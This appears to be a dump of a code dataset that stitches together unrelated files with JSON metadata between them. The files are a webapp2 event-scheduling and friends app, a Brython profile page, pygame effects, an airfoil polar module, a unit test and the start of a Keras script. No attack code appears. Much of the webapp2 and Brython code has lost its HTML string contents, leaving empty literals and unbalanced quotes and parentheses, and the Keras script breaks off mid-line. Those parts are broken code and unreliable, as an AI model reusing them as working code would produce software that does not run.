1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (start >= end):\n thing = \"Event not created. Start time must be before end time.\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n event = Event(parent=thekey) #so that this event will be a child of the current user\n event.name = name #set the event's properties\n event.date = date\n event.start = start\n event.end = end\n event.attendance = attendance\n event.sun = sunday\n event.mon = monday\n event.tues = tuesday\n event.wed = wednesday\n event.thurs = thursday\n event.fri = friday\n event.sat = saturday\n event.put() #add the event to the database\n thing = 'Event Created' #just a little message confirming it worked\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values)) #give back the main page again\n \nclass LogIn(webapp2.RequestHandler) :\n #never happens, as the log in button no longer exists\n def post(self) :\n self.response.out.write('Hey, you tried to log in!')\n \nclass ManageEvents(webapp2.RequestHandler): #when you click the 'Manage Events' button in the sidebar\n def get(self):\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Event.all() #q is now all Event entities\n q.ancestor(thekey) #q is now filtered to only be Event entities of the current user\n thing = \"Events:\\n\"\n # for p in q: #for each of the user's events\n # thing += (p.name +\"\\n\")\n # event_k = db.Key.from_path('User', user.nickname(), 'Event', 1)\n # event = db.get(event_k)\n # thing = event.name\n template_values = {'events' : q, 'indexNumber2' : 2} #we'll pass the user's events to the template\n self.response.out.write(template.render('HTML/newIndex.html', template_values)) #now we write to the index2 template\n \nclass DeleteEvent(webapp2.RequestHandler): #when you click a delete event button from within 'Manage Events'\n def get(self):\n thekey = self.request.get('thekey') #thekey (key for the Event entity) is passed in with a hidden input in index2.html\n db.delete(thekey) #delete it\n thing = 'Event Deleted'\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values)) #back to index.html\n \nclass Friends(webapp2.RequestHandler): #when you click the 'Friends' button in the sidebar (or one of the 'Back' buttons)\n def get(self):\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Friend.all() #q is now all Friend entities\n q.ancestor(thekey) #q is now filtered to only be Friend entities of the current user\n thing = 'You hit the Friends button'\n template_values = {'friends' : q, 'indexNumber3' : 3}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass FrinvitationSend(webapp2.RequestHandler): #when you send a friend invitation\n def get(self):\n recipient = self.request.get('addfriendusername')\n recipient_k = db.Key.from_path('User', recipient)\n thing = recipient_k\n derp = db.get(recipient_k)\n if (derp):\n user = users.get_current_user()\n if (recipient == user.nickname()):\n template_values = {'message' : \"You can't be friends with yourself\", 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n frinvitation = Frinvitation(parent=recipient_k, key_name = user.nickname()) #so that this Frinvitation will be a child of the recipient\n frinvitation.sender = user.nickname()\n frinvitation.put()\n template_values = {'message' : 'Invitation sent to ' + recipient, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n template_values = {'message' : recipient + ' is not a valid username', 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass DisplayFrinvitations(webapp2.RequestHandler): #when you click the 'Friend Invitations' button\n def get(self):\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Frinvitation.all() #q is now all Frinvitation entities\n q.ancestor(thekey) #q is now filtered to only be Frinvitation entities of the current user\n thing = 'Here are your friend invitations'\n template_values = {'frinvitations' : q, 'indexNumber4' : 4}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass Accept(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n sender = self.request.get('sender')\n thekey = self.request.get('thekey')\n sender_k = db.Key.from_path('User', sender)\n recipient_k = db.Key.from_path('User', user.nickname())\n senderObject = Friend(parent=sender_k, key_name = user.nickname())\n senderObject.name = user.nickname()\n senderObject.put()\n recipientObject = Friend(parent=recipient_k, key_name = sender)\n recipientObject.name = sender\n recipientObject.put()\n db.delete(thekey)\n thing = 'Invitation Accepted'\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass Ignore(webapp2.RequestHandler):\n def get(self):\n thekey = self.request.get('thekey') #thekey (key for the Frinvitation entity) is passed in with a hidden input in index4.html\n db.delete(thekey) #delete it\n thing = 'Wow what a jerk'\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass Unfriend(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n name2 = self.request.get('name2')\n thekey = self.request.get('thekey')\n friend_k = db.Key.from_path('User', name2, 'Friend', user.nickname())\n db.delete(thekey)\n db.delete(friend_k)\n thing = name2 + ' has been unfriended'\n template_values = {'message' : thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n \nclass LogOut(webapp2.RequestHandler) :\n #when you click the 'Log Out' button in the sidebar\n def post(self) :\n self.redirect(users.create_logout_url('/'))\n \nclass AjaxManageEvents(webapp2.RequestHandler):\n def post(self):\n user = users.get_current_user()\n text = ''\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n target = self.request.get('target')\n q = Event.all() #q is now all Event entities\n q.ancestor(thekey)\n allEvents = 0\n if (not (target == 'null')): #if there's a target\n #q.filter(\"date =\", target) #also filter the events by the target date\n text += \"Events for: \" + target\n else:\n text += \"All Events\"\n allEvents = 1\n text += ''\n for p in q:\n if (eventOccursOnDate(p, target) == \"yes\" or allEvents == 1): #if the event and the target date overlap (taking repeats into consideration)\n text += ('')\n text += ('')\n text += ('')\n text += ('')\n text += ('')\n text += ('')\n text += (''\n key2 = str(p.key())\n text += ''\n text +='
DateStartEndLikelihoodRepeatDelete
' + p.name + '
' + p.date + '' + p.start + '' + p.end + '' + p.attendance + '%')\n if p.sun:\n text += 'Su'\n if p.mon:\n text += 'Mo'\n if p.tues:\n text += 'Tu'\n if p.wed:\n text += 'We'\n if p.thurs:\n text += 'Th'\n if p.fri:\n text += 'Fr'\n if p.sat:\n text += 'Sa'\n text += '')\n text += '
' \n self.response.out.write(text)\n \nclass AjaxDeleteEvent(webapp2.RequestHandler):\n def post(self):\n thekey = self.request.get('thekey')\n db.delete(thekey)\n self.response.out.write('Event Deleted')\n \nclass AjaxFriends(webapp2.RequestHandler):\n def post(self):\n text = ''\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Friend.all() #q is now all Friend entities\n q.ancestor(thekey) #q is now filtered to only be Friend entities of the current user\n text += ''\n text += ''\n for p in q:\n text += ('

' + p.name + '

')\n key2 = str(p.key())\n text += '\" #back to Create Event page\n text += \"
\" #form with action for handler on line 433\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\" #various other inputs\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"\"\n for p in q:\n text += \"\" #gives a checkbox and a priority select menu for each friend\n text += \"\"\n text += \"\"\n text += \"\"\n text += \"
Event name:
Duration in hours:Duration in minutes:
Earliest start:Latest start:
Between\"\n text += \"and
Friends to invite:
\" + p.name + \"Priority:
\"\n text += \"\"\n text += \"
\"\n self.response.out.write(text)\n \nclass CreateEventWithFriends(webapp2.RequestHandler): #the thing that actually recommends the times\n def post(self):\n text = '' #for debugging purposes\n friendsInvited = '' #pass this as a big string to the html, which will pass it to the JavaScript, which will pass it back here\n user = users.get_current_user()\n if not user:\n self.redirect(users.create_login_url(self.request.uri))\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n q = Friend.all() #q is now all Friend entities\n q.ancestor(thekey) #q is now filtered to only be Friend entities of the current user\n eName = self.request.get('eventName') #get all the passed-in values\n hours = self.request.get('hours')\n minutes = self.request.get('minutes')\n earliestStart = self.request.get('earliestStart')\n latestStart = self.request.get('latestStart')\n first = self.request.get('first')\n last = self.request.get('last')\n #invited = list()\n #priority = list()\n #name = list()\n #uMap = list() #a list of 'unavailability maps' for each friend\n helpers = list()\n #index = 0\n #index2 = 0\n invitedCount = 0\n stupidDate = verifyDateIsNotStupid(first)\n stupidDate2 = verifyDateIsNotStupid(last)\n stupidStart = verifyTimeIsNotStupid(earliestStart)\n stupidEnd = verifyTimeIsNotStupid(latestStart)\n if (stupidDate == \"stupid\" or stupidDate2 == \"stupid\"):\n thing = \"Date format improper. Proper format for dates is: YYYY-MM-DD\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (stupidStart == \"stupid\" or stupidEnd == \"stupid\"):\n thing = \"Time format improper. Proper format for times is: HH:MM\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n for p in q:\n #name.append(p.name) #for each friend, their name, invitation status, and priority should be at matching indexes\n #invited.append(self.request.get(p.name))\n #priority.append(self.request.get(p.name +'priority'))\n #index += 1 #a count of the total number of friends\n if (self.request.get(p.name) == 'yes'): #if the friend was invited\n helpers.append(EWFHelper(p.name, self.request.get(p.name), self.request.get(p.name+'priority')))\n if (invitedCount > 0): #if not the first friend we're adding to the string\n friendsInvited += '?' #put a question mark in front of the name\n friendsInvited += p.name #add the name to the string\n invitedCount += 1\n \n if (not eName or not earliestStart or not latestStart or not first or not last): #if something was left null\n thing = 'Event Incomplete. Event Not Created.'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (invitedCount == 0): #if no friends were invited\n thing = 'Must Invite At Least 1 Friend'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (\"'\" in eName): #if there's an apostrophe in the event name\n thing = \"Event name must not contain an apostrophe\"\n template_values = {'message': thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (\">\" in eName):\n thing = \"Event name must not contain a greater than sign\"\n template_values = {'message': thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else: #carry on\n totalIncrements = list()\n increments = list()\n validStarts = list()\n incrementCount = 0\n validStartsCount = 0\n span = daysBetween(first, last)\n date = first\n earliestInMinutes = toMinutes(earliestStart)\n latestInMinutes = toMinutes(latestStart)\n herp = int(hours)\n derp = int(minutes)\n durationInMinutes = ((herp*60)+(derp))\n start = earliestInMinutes\n end = (latestInMinutes + durationInMinutes) #end is latest start + duration, all in minutes\n if (end > 1440): #if the event extends into the next day\n thing = 'Events Can Not Extend Beyond Midnight'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (span == -1): #if the start and end dates are flipped (or over 100 years apart)\n thing = 'End Date Must Come After Start Date'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (earliestInMinutes >= latestInMinutes):\n thing = 'Latest Start must be after Earliest Start'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (not(earliestInMinutes % 5 == 0) or not(latestInMinutes % 5 == 0)): #start times are not multiples of 5\n thing = 'Start and End Times must end in multiples of 5 minutes'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else: #carry on\n k = 0\n \n #this loop gets ALL increments and loads them into the totalIncrements list\n while (k <= span): #for each day in the span\n time = start #time is earliest start, in minutes\n while (time <= end): #between the earliest possible start and latest possible end\n time2 = backToString(time) #turn the minutes back into a date string\n totalIncrements.append(Increment(date, time2)) #add an increment corresponding to this date and time\n time += 15 #next increment will be 15 minutes later\n incrementCount += 1\n date = incrementDay(date) #go to next day\n k += 1\n \n #this loop initializes each invited friend's availabilities\n for f in helpers: #for each invited friend\n for inc in totalIncrements: #for each increment\n f.availabilities[inc.date+inc.time] = 1.0 #initialize its availability to 1\n \n #this loop reduces each invited friend's availabilities based on their events\n for f in helpers: #for each invited friend\n r_k = db.Key.from_path('User', f.name)\n curr = db.get(r_k)\n thekey2 = curr.key()\n r = Event.all()\n r.ancestor(thekey2) #r is now all of the friend's events\n for s in r: #for each of the invited friend's events\n for inc in totalIncrements: #for each increment\n if incrementWithinEvent(inc, s) == 'yes': #if the increment falls within the event\n f.availabilities[inc.date+inc.time] -= (float(s.attendance) * .01) #reduce inc's availability by event's attendance\n if f.availabilities[inc.date+inc.time] < 0: #if availability is now negative\n f.availabilities[inc.date+inc.time] = 0 #just set it to zero\n i = 0\n date = first\n \n #this loop puts all possible start times into the validStarts list\n while (i <= span): #for each day in the span\n time = start #time is earliest start, in minutes\n while (time <= latestInMinutes): #between the earliest possible start and latest possible start\n time2 = backToString(time) #turn the minutes back into a date string\n validStarts.append(Increment(date, time2)) #add an increment corresponding to this date and time\n time += 15 #next increment will be 15 minutes later\n validStartsCount += 1\n date = incrementDay(date) #go to next day\n i += 1\n \n options = list()\n #this is the ultimate loop that finally puts it all together\n for w in validStarts: #for each possible start time\n increments = incrementsForStart(w, durationInMinutes) #get all increments for the event for the start time\n #text += 'Start: ' + w.date + ' ' + w.time + ' '\n oScore = 0\n moScore = 0 #maximum overall score\n for f in helpers: #for each invited friend\n aScore = 0\n maScore = 0 #maximum availability score\n for inc in increments: #for each increment\n iScore = f.availabilities[inc.date+inc.time] #get the friend's availability at this increment\n aScore += iScore #add it to the friend's overall availability score\n maScore += 1 #full availability\n pScore = aScore * int(f.priority) #scale overall availability score by friend's priority\n mpScore = maScore * int(f.priority)\n oScore += pScore #add pScore to start time's overall score\n moScore += mpScore\n percentScore = 100*(oScore/moScore)\n wmin = toMinutes(w.time) #w's start time\n finishedmin = wmin + durationInMinutes #w's end time, in minutes\n finished = backToString(finishedmin) #w's end time, as a string\n options.append(Option(w.date, w.time, finished, percentScore)) #add an option for start w with its calculated overall score\n \n options.sort(key=lambda x: x.score, reverse=True)\n #for o in options:\n #text += 'Option: ' + o.date + ' ' + o.time + ' ' + str(o.score) + ' '\n template_values = {'message' : text, 'options' : options, 'indexNumber1' : 1, 'sender' : user.nickname(), 'friendsinvited' : friendsInvited, 'ename': eName}\n self.response.out.write(template.render('HTML/newIndex.html', template_values)) #give back the main page again\n \nclass AjaxEnvitations(webapp2.RequestHandler): #displays all Envitations\n def post(self):\n text = \"\"\n user = users.get_current_user()\n current_k = db.Key.from_path('User', user.nickname()) #get the current user's key\n current = db.get(current_k) #get the db entity corresponding to the current user\n thekey = current.key() #get the current user's key...possibly equivalent to two lines up\n #q = memcache.get(thekey)\t\t\t\t#get q from the memcache\n #if q is None:\n q = Envitation.all() #q is now all Envitation entities\n q.ancestor(thekey) #q is now filtered to only be Envitation entities of the current user\n #memcache.add(thekey,q)\t\t\t\t#add q to the memcache under the key thekey\n count = 0\n for p in q:\n #for each Envitation\n count += 1\n text += ('

From: ' + p.sender + '

')\n #show its information\n text += '

Event: ' + p.eName + '

'\n text += '

Date: ' + p.date + '

'\n text += '

Start: ' + p.start + '

'\n text += '

End: ' + p.end + '

'\n key2 = str(p.key())\n text += '\n\n\n\"\"\"\n\nteacher_profile_form_start = \"\"\"\n
\nCreate Session\n
\n\n
\n
\n

Account Settings

\n\n \n \n\n \n \n \n \n \n\n \n \n\n \n \n\n \n \n\n \n
\n
\n\"\"\"\n\nteacher_profile_subject_template = \"\"\"\n \n \n
\n\"\"\"\n\nteacher_profile_subject_template_checked = \"\"\"\n \n \n
\n\"\"\"\n\nteacher_profile_form_end = \"\"\"\n \n\n \n \n\"\"\"\n\nnull = \"\"\"\n \n \n\"\"\"\n\nclaim_teacher_button = \"\"\"\n

\n
\n\n\n
\n\"\"\"\n\ndef get_cookies():\n cookie_list = document.cookie.split('; ')\n cookie_dict = dict()\n for c in cookie_list:\n if c == \"\":\n continue\n cookie_tuple = c.split('=')\n cookie_dict.update({cookie_tuple[0]: cookie_tuple[1].replace('\"', '')})\n return cookie_dict\n\ndef deserialize(obj_str):\n return javascript.JSON.parse(obj_str)\n\nasync def fetch_api(endpoint=\"/api/search-times\", params={}):\n \"\"\"\n Fetches stuff from any API endpoint\n \"\"\"\n req = await aio.get(URL + endpoint, data=params)\n response = deserialize(req.data)\n\n return response\n\nasync def fetch_teachers():\n response_dict = await fetch_api(\"/api/teachers\")\n return response_dict\n\nasync def fetch_api(endpoint=\"/api/search-times\", params={}):\n \"\"\"\n Fetches stuff from any API endpoint\n \"\"\"\n params.update(get_cookies())\n\n req = await aio.get(URL + endpoint, data=params)\n response = deserialize(req.data)\n\n return response\n\nasync def rename_teacher():\n # await fetch_api('/api/claim-teacher')\n succeeded = await fetch_api('/api/make-teacher', {\"pass\": document['teacher-secret'].value})\n if succeeded:\n alert(\"You are now a teacher!\")\n await load_settings_page()\n else:\n alert(\"Wrong Password!\")\n\ndef rename_teacher_run(vars):\n aio.run(rename_teacher())\n\ndef document_get(value):\n try:\n return document[value]\n except:\n return \"\"\n\nasync def submit_form():\n is_teacher = await check_teacher()\n\n if is_teacher:\n subjects_str = \"\"\n\n params = dict()\n\n for d in document.select(\".form-checkbox\"):\n if d.checked:\n subjects_str += d.value + \"|\"\n\n subjects_str = subjects_str[:-1]\n\n params.update({\"subjects\": subjects_str})\n\n bio = document['bio'].value\n phone_number = document['phone_number'].value\n\n first_name = document['first_name'].value\n last_name = document['last_name'].value\n\n zoom = document['zoom'].value\n max_hours = document['max_hours'].value\n\n icon = document['icon'].value\n\n if first_name != \"\": params.update({\"first_name\": first_name})\n if last_name != \"\": params.update({\"last_name\": last_name})\n if bio != \"\": params.update({\"bio\": bio})\n if zoom != \"\": params.update({\"zoom_id\": zoom})\n if max_hours != \"\": params.update({\"max_hours\": int(max_hours)})\n if phone_number != \"\": params.update({\"phone_number\": phone_number})\n if icon != \"\": params.update({\"icon\": icon})\n\n await fetch_api(\"/api/edit-teacher\", params)\n else:\n params = dict()\n\n first_name = document['first_name'].value\n last_name = document['last_name'].value\n\n wechat = document['wechat'].value\n phone_number = document['phone_number'].value\n\n if first_name != \"\": params.update({\"first_name\": first_name})\n if last_name != \"\": params.update({\"last_name\": last_name})\n if wechat != \"\": params.update({\"wechat\": wechat})\n if phone_number != \"\": params.update({\"phone_number\": phone_number})\n\n await fetch_api(\"/api/edit-student\", params)\n\n alert(\"Your profile has been updated!\")\n\ndef submit_form_run(vars):\n aio.run(submit_form())\n\nasync def load_settings_page():\n \"\"\"\n Loads setting page and checks if student or teacher\n \"\"\"\n is_teacher = await check_teacher()\n # is_teacher = check_teacher()\n if is_teacher:\n teacher_details = await fetch_api('/api/get-teacher-by-email')\n\n if 'icon' not in teacher_details:\n teacher_details['icon'] = 'https://github.com/identicons/jasonlong.png'\n\n if 'max_hours' not in teacher_details:\n teacher_details['max_hours'] = 1\n\n if 'phone_number' not in teacher_details:\n teacher_details['phone_number'] = '000-000-0000'\n\n document['user-settings'].html = teacher_profile_form_start.format(**teacher_details)\n teacher_subjects = teacher_details['subjects'].split(\"|\")\n\n for subject in SUBJECTS:\n if subject in teacher_subjects:\n document['inner-form'].html += teacher_profile_subject_template_checked.format(subject=subject)\n else:\n document['inner-form'].html += teacher_profile_subject_template.format(subject=subject)\n\n document['inner-form'].html += teacher_profile_form_end.format(**teacher_details)\n\n document['save-settings'].bind(\"mousedown\", submit_form_run)\n else:\n student_details = await fetch_api('/api/get-student-by-email')\n\n # alert(student_details)\n\n if 'first_name' not in student_details:\n student_details['first_name'] = \"\"\n if 'last_name' not in student_details:\n student_details['last_name'] = \"\"\n if 'phone_number' not in student_details:\n student_details['phone_number'] = \"\"\n if 'wechat' not in student_details:\n student_details['wechat'] = \"\"\n\n document['user-settings'].html = student_profile_form.format(**student_details)\n document['user-settings'].html += claim_teacher_button\n document['save-settings'].bind(\"mousedown\", submit_form_run)\n\n document['claim-teacher'].bind(\"mousedown\", rename_teacher_run)\n\n\nasync def check_teacher():\n return await fetch_api(\"/api/check-teacher\")\n # return await fetch_api(\"/api/make-teacher\")\n\naio.run(load_settings_page())","sub_path":"static/compiled/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"16729942","text":"import pygame, random\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, data):\n super().__init__()\n self.surface = data[\"surface\"]\n self.images = data[\"images\"]\n self.image = self.images[0]\n self.rect = self.image.get_rect()\n self.rect.centerx = data[\"coords\"][0]\n self.rect.bottom = data[\"coords\"][1]\n # variables for animation\n self.frame = 0\n self.frame_timer = pygame.time.get_ticks()\n self.frame_delay = 100\n # Play the explosion sound effect\n self.chosen_sfx = random.choice(data[\"explosions_sfx\"])\n self.chosen_sfx.play()\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.frame_timer > self.frame_delay:\n self.frame_timer = now\n self.frame += 1\n\n if self.frame == 4:\n self.kill()\n else:\n center = self.rect.center\n self.image = self.images[self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\nclass Particle():\n def __init__(self, window, win_res, x, y, colors):\n self.window = window\n self.win_res = win_res\n self.x = x\n self.y = y\n self.spdx = random.choice([num for num in range(-8,8) if num not in [-1,0,1]])\n self.spdy = random.choice([num for num in range(-8,8) if num not in [-1,0,1]])\n self.size = random.choice([4,8])\n self.color = random.choice(colors)\n\n def update(self):\n self.x += self.spdx\n self.y += self.spdy\n pygame.draw.rect(self.window, self.color, (self.x, self.y, self.size, self.size))\n","sub_path":"DEV/old/effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"26729270","text":"import numpy as np\n# import sharpy.utils.algebra as algebra\nfrom sharpy.utils.constants import deg2rad\n\n\nclass polar(object):\n\n def __init__(self):\n\n self.table = None\n self.aoa_cl0_deg = None\n\n def initialise(self, table):\n\n # Store the table\n if (np.diff(table[:, 0]) > 0.).all():\n self.table = table\n else:\n raise RuntimeError(\"ERROR: angles of attack not ordered\")\n\n # Look for aoa where CL=0\n npoints = self.table.shape[0]\n matches = []\n for ipoint in range(npoints - 1):\n if self.table[ipoint, 1] == 0.:\n matches.append(self.table[ipoint, 0])\n elif (self.table[ipoint, 1] < 0. and self.table[ipoint + 1, 1] > 0):\n # elif ((self.table[ipoint, 1] < 0. and self.table[ipoint + 1, 1] > 0) or\n # (self.table[ipoint, 1] > 0. and self.table[ipoint + 1, 1] < 0)):\n if (self.table[ipoint, 0] <= 0.):\n matches.append(np.interp(0,\n self.table[ipoint:ipoint+2, 1],\n self.table[ipoint:ipoint+2, 0]))\n # else:\n # print(\"WARNING: Be careful negative camber airfoil not supported\")\n\n iaoacl0 = 0\n aux = np.abs(matches[0])\n for imin in range(len(matches)):\n if np.abs(matches[imin]) < aux:\n aux = np.abs(matches[imin])\n iaoacl0 = imin\n self.aoa_cl0_deg = matches[iaoacl0]\n\n def get_coefs(self, aoa_deg):\n\n cl = np.interp(aoa_deg, self.table[:, 0], self.table[:, 1])\n cd = np.interp(aoa_deg, self.table[:, 0], self.table[:, 2])\n cm = np.interp(aoa_deg, self.table[:, 0], self.table[:, 3])\n\n return cl, cd, cm\n\n def get_aoa_deg_from_cl_2pi(self, cl):\n\n return cl/2/np.pi/deg2rad + self.aoa_cl0_deg\n\n def redefine_aoa(self, new_aoa):\n\n naoa = len(new_aoa)\n # Generate the same polar interpolated at different angles of attack\n # by linear interpolation\n table = np.zeros((naoa, 4))\n table[:, 0] = new_aoa\n for icol in range(1, 4):\n table[:, icol] = np.interp(table[:, 0],\n self.table[:, 0],\n self.table[:, icol])\n\n new_polar = polar()\n new_polar.initialise(table)\n return new_polar\n\n\ndef interpolate(polar1, polar2, coef=0.5):\n\n all_aoa = np.sort(np.concatenate((polar1.table[:, 0], polar2.table[:, 0]),))\n\n different_aoa = []\n different_aoa.append(all_aoa[0])\n for iaoa in range(1, len(all_aoa)):\n if not all_aoa[iaoa] == different_aoa[-1]:\n different_aoa.append(all_aoa[iaoa])\n\n new_polar1 = polar1.redefine_aoa(different_aoa)\n new_polar2 = polar2.redefine_aoa(different_aoa)\n\n table = (1. - coef)*new_polar1.table + coef*new_polar2.table\n\n new_polar = polar()\n new_polar.initialise(table)\n return new_polar\n","sub_path":"sharpy/aero/utils/airfoilpolars.py","file_name":"airfoilpolars.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"437027535","text":"from app.controller.command.commands import IQuitCommand\nfrom app.model import User, Team, Permissions\nfrom unittest import TestCase\nfrom tests.memorydb import MemoryDB\n\n\ndef make_user(slack, gid, guser, perm):\n user = User(slack)\n user.github_id = gid\n user.github_username = guser\n user.permissions_level = perm\n return user\n\n\ndef make_team(ghid, leads_ghid, members_ghid):\n team = Team(ghid, 'COVID19', 'Crime Stoppers')\n team.team_leads = team.team_leads.union(leads_ghid)\n team.members = team.members.union(members_ghid)\n return team\n\n\nclass TestIQuitCommand(TestCase):\n def setUp(self):\n self.users = {\n 'u1': make_user('u1', 'g1', 'G1', Permissions.admin),\n 'u2': make_user('u2', 'g2', 'G2', Permissions.member),\n 'u3': make_user('u3', 'g3', 'G3', Permissions.team_lead),\n 'u4': make_user('u4', 'g4', 'G4', Permissions.team_lead),\n 'u5': make_user('u5', 'g5', 'G5', Permissions.member),\n 'u6': make_user('u6', 'g6', 'G6', Permissions.member)\n }\n self.teams = {\n 't1': make_team('t1', [], []),\n 't2': make_team('t2', ['g1', 'g3'], ['g1', 'g2', 'g3']),\n 't3': make_team('t3', ['g1'], ['g1', 'g4', 'g2', 'g5', 'g6']),\n 't4': make_team('t4', [], ['g6']),\n 't5': make_team('t5', ['g4'], ['g5', 'g3']),\n 't6': make_team('t6', ['g3', 'g4'], ['g3', 'g4']),\n 't7': make_team('t7', ['g3'], ['abacus', 'g3'])\n }\n self.facade = MemoryDB(users=self.users.values(),\n teams=self.teams.values())\n self.cmd = IQuitCommand(self.facade)\n\n def test_get_no_duplicate_users(self):\n actual, resp = self.cmd.handle('', 'u2')\n self.assertEqual(actual.count('u1'), 1)\n self.assertEqual(actual.count('u3'), 1)\n\n def test_members_only_see_leads_n_admins(self):\n actual, resp = self.cmd.handle('', 'u6')\n self.assertEqual(actual.count('u1'), 1)\n self.assertNotEqual(actual.count('u2'), 1)\n self.assertNotEqual(actual.count('u3'), 1)\n self.assertNotEqual(actual.count('u6'), 1)\n\n def test_no_team_lead_so_return_nobody(self):\n actual, resp = self.cmd.handle('', 'u5')\n self.assertEqual(actual.count('u1'), 1)\n self.assertEqual(actual.count('u3'), 1)\n self.assertEqual(actual.count('u4'), 1)\n self.assertNotEqual(actual.count('u5'), 1)\n\n def test_cannot_find_caller(self):\n actual, resp = self.cmd.handle('', 'unknown user')\n self.assertEqual(actual, IQuitCommand.lookup_error)\n self.assertEqual(resp, 200)\n\n def test_call_as_team_lead(self):\n self.teams['t6'].github_team_name = 'pretty bad lol'\n actual, resp = self.cmd.handle('', 'u4')\n self.assertTrue('replacing you with <@u5>' in actual or\n 'replacing you with <@u3>' in actual)\n self.assertEqual(actual.count('u1'), 1)\n self.assertIn('cannot find your replacement; deleting team', actual)\n\n def test_call_as_team_lead_gh_only_members(self):\n self.teams['t7'].github_team_name = 'somewhat sketch'\n actual, resp = self.cmd.handle('', 'u3')\n self.assertIn(\n '*Team somewhat sketch*:'\n ' cannot find your replacement; deleting team', actual)\n\n def test_call_as_admin(self):\n actual, resp = self.cmd.handle('', 'u1')\n self.assertEqual(IQuitCommand.adminmsg, actual)\n","sub_path":"tests/app/controller/command/commands/iquit_test.py","file_name":"iquit_test.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"336279276","text":"#!/usr/bin/python\nfrom keras.models import Model, Sequential\nfrom keras.layers import Input, Dense\nfrom keras.layers.recurrent import LSTM\nfrom keras.utils import plot_model\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing import sequence\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import Dropout\nfrom keras.preprocessing import sequence\nfrom keras.layers.wrappers import Bidirectional\n\nimport tensorflow as tf\nimport os, sys\nimport numpy as np\nimport pickle\n# 套件匯入與設定\n# GPU設定\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\" #1080\n# config = tf.ConfigProto()\n# config.gpu_options.allow_growth=True\n# sess = tf.Session(config=config)\n\ndef load_data(train_data_path):\n # 讀入訓練資料\n x_train = []\n y_train = []\n with open(train_data_path, 'r') as f:\n for i, line in 